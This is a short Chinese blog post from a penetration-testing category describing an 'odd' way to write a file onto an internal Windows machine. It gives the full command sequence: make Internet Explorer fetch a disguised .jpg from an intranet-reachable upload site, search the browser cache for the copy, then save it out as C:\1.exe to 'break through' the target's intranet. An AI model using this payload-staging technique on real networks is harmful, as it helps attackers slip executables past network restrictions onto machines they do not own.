← 返回首页

一个奇葩的内网写入文件方法

作者:刘海哥
发布时间:2016-07-27 10:24:51
浏览:8069    评论:70

一个奇葩的内网写入文件方法

2016-07-27 10:24:51 70 8069


引用90sec探讨的问题


找到一个可以上传图片的web站点。
"C:\Program Files\Internet Explorer\iexplore.exe" http://内网可以访问的站点/0/09/40/75/91ef76c6a7efce1bee5deaebac51f3deb48f6598.jpg 
执行访问后会有缓存文件。
然后 cd 到C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files>
执行dir /s /w 91ef76c6a7efce1bee5deaebac51f3deb48f6598*.*   找到路径
接下来就是
 type 路径>C:\1.exe  应该可以突破他内网了。
类别 渗透测试

关于作者

刘海哥5篇文章100篇回复